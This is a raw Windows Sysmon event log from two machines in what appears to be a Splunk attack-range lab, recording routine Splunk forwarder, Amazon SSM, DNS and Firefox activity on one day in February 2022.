23542300x8000000000000000300103Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:11.544{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2B63B46AC80EF0D3702C1B0A4AD93BC,SHA256=C4CAD0F243D2605B3BA866E9EFA4C183D9575F92C81472326897E9085CDC1156,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223889Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:12.663{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A2FA895B882770199D97CA56C0B93BF,SHA256=946DD2A5585A625BE0AFCE51C93B22521591258D62EED499302EB064C1A30723,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300104Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:12.560{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6B4A5FE122C526D681F0F18B2634CB5,SHA256=BEB7C8330137ABC31459AD0B92743C826A3BC9513E5B05E46CB6ED2609DAC871,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223890Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:13.677{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66694E4A55961B69449DBCD6FFC2FFD2,SHA256=21D8D598BA469AA3CC5EDF92199083C2EC015BE85FFE2D8ECFAF971A3A68BB4C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000300106Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:11.618{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49690-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000300105Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:13.579{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18FD10A49545B5C7D9D1FA22AC25EEDD,SHA256=91389B7B9DAAE6892057B394C67566B847AE2BB416B65F049A63EE775FB6CA2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223892Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:14.693{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D517207959D9D40F0DC25F4C369B1720,SHA256=26EE8CE4116807BBF848DFF1D88A30256F226FEDD3353DCDB31255AC7BB3AEF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300107Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:14.596{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC46E1D8158C500137628F68082B0D3C,SHA256=7171E9C6DA72AC8C6E6D8B4715EC6319C65F7556FDAB14195C7D955FF9C78964,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223891Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:11.636{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51817-false10.0.1.12-8000- 23542300x8000000000000000223893Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:15.927{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE9A4E9B14C45FCEC1FF9BE7DA7482E6,SHA256=67E4B29A7FEE33CA85273EA45DC5C51330CE61D956BEE5E83B0F6A805712F0C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300108Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:15.627{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22AE425158C70773D1096868EE19E7B0,SHA256=5F58816CF36F8395D73A2295598E2331C539A87EE6A4064A1C3CDFEE9C00B1D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223894Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:16.958{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A0FEC81EF23F3BC58E55104F1062229,SHA256=47F34C1D994D01740C5EF3790875EC2387743DD5F41952BEB1D656570B93623E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300110Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:16.979{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-173MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300109Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:16.642{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93EA69F6F9EF077AEFB5149A013BEBD8,SHA256=DDFD15ACBF80CE0D3F91080BBA5655BF2FBD4AF9294A4F3D7697C0307C2E3D85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223895Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:17.974{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A99D19F30C2D4306114AE4673EE60D4,SHA256=29DD7CE6C6FAA673A06250CD049FDD22CA2F1A14BB38BC6165FE618D05A26DFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300112Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:17.999{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-174MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300111Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:17.658{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EC535451C9D5AB8E43153B741CB713F,SHA256=3D87CDD92183CA18C0E62FFC1BA4181CD6ADE89F511BE2316261C1D8378AC835,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223896Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:18.989{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC70D81A9BC20975BA271C6754F31A64,SHA256=9E18A815842C414D2B6B00F2F8B44D5222A1E2392B4BF6FA01BEC00EFEFE7B3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300113Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:18.658{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D65E3C2AA868CEA0CCC62356D40B3507,SHA256=61EAA5B2117089A7DB0D4E86FB4547F660F41CDBA80DC7CCDFC0776609949E16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223898Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:19.990{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F11CC27FDA42FC25416BC1D3D9AF7E64,SHA256=82DCAA6C14F12B8262A999E8C2DDB4E2D838AD6310979BA1F4FBAD5733A80F1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300140Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:19.827{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=7C234A5ED846117ED5C7C5E03A6989E2,SHA256=006A9D5B6EC311F400025972583442D5AD64B2F5B92A25A26574629290AC6551,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000300139Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:18.114{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local52112- 354300x8000000000000000300138Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:18.114{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49692-false52.222.236.23server-52-222-236-23.fra56.r.cloudfront.net443https 354300x8000000000000000300137Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:18.113{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local52877- 354300x8000000000000000300136Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:18.110{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53422- 354300x8000000000000000300135Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:17.585{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49691-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000300134Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:19.697{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8E9B7F8281A2EBB549C52DA4AEA5C1C,SHA256=538388753B7E865B10C26ADF18C78CA98E4FCBC10443061EA4329E2E81A5C9EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000300133Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:19.643{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1B07-6216-9707-000000003802}6276C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000223897Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:17.635{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51818-false10.0.1.12-8000- 10341000x8000000000000000300132Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:19.643{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300131Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:19.643{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300130Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:19.643{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300129Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:19.643{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300128Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:19.643{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1B07-6216-9707-000000003802}6276C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000300127Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:19.643{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1B07-6216-9707-000000003802}6276C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000300126Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:19.645{C8EA50B7-1B07-6216-9707-000000003802}6276C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x8000000000000000300125Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:18.392{C8EA50B7-11AA-6216-1605-000000003802}2228prod.balrog.prod.cloudops.mozgcp.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000300124Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:18.365{C8EA50B7-11AA-6216-1605-000000003802}2228prod.balrog.prod.cloudops.mozgcp.net035.244.181.201;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000300123Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:19.381{C8EA50B7-1B07-6216-9607-000000003802}6668900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000300122Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:19.158{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000300121Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:19.043{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1B07-6216-9607-000000003802}6668C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300120Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:19.027{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300119Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:19.027{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 